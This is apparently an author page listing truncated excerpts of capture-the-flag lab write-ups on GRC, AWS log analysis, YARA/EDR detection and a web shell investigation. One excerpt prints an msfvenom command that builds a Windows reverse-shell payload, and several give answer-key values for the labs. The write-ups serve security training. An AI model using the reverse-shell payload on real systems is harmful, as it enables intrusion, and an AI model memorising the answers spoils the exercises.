Aleyna Doğan

Lab link. Questions 1. What does GRC stand for? 2. What is the flag you receive after performing the risk assessment? Vendor 1Azure Falcon Vendor 2Indigo Dragon Vendor 3Sapphire Wyrm

Lab link. Questions 1. What is the flag value once Glitch gets reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt. msfvenom -p windows/x64/shell_reverse_tcp LHOST=Your_IP LPORT=4444 -f powershell Let’s copy …

Lab link. Questions 1. What is the other activity made by the user glitch aside from the ListObject action? PutObject 2. What is the source IP related to the S3 bucket activities of the user glitch? 53.94.201.69 3. Based on the eventSource field, what AWS service generates the ConsoleLogin event? signin.amazonaws.com 4. When did the …

Lab link. Questions 1. What is the flag displayed in the popup window after the EDR detects the malware? We open powershell and go to the directory to run the YARA rule in the example. cd C:\Tools .\JingleBells.ps1 We go to the location of the MerryChristmas.exe file, execute it (by clicking on it twice) and …

Lab link. Questions 1. What is the flag discovered after navigating through the wishes? 2. What is the flag seen on the possible proof of sabotage?

Lab link. McSkidy suspects that an attacker simulated an intrusion using the T1566.001 Spearphishing with an attachment technique defined in the MITRE ATT&CK framework. We will recreate this attack and analyze the artifacts left behind. PowerShell Usage 1. Running the Help Command in PowerShell First, the Get-Help Invoke-AtomicTest command is run to get information about …

Lab link. Questions 1. BLUE: Where was the web shell uploaded to? Answer format: /directory/directory/directory/filename.php /media/images/rooms/shell.php 2. BLUE: What IP address accessed the web shell? 10.11.83.34 3. RED: What is the contents of the flag.txt? This command adds a line to the system’s /etc/hosts file. The added line associates the name frostypines.thm with the IP address …

Lab link. Questions 1. What is the name of the account causing all the failed login attempts? service_admin 2. How many failed logon attempts were observed? 6791 3. What is the IP address of Glitch? 10.0.255.1 4. When did Glitch successfully logon to ADM-01? Format: MMM D, YYYY HH:MM:SS.SSS Dec 1, 2024 08:54:39.000 5. What …

Lab link. McSkidy tapped keys with a confident grin,A suspicious website, now where to begin?She’d seen sites like this, full of code and of grime,Shady domains, and breadcrumbs easy to find. We can visit the target IP address website through the browser. The site appears to be one that converts YouTube videos to MP3 or …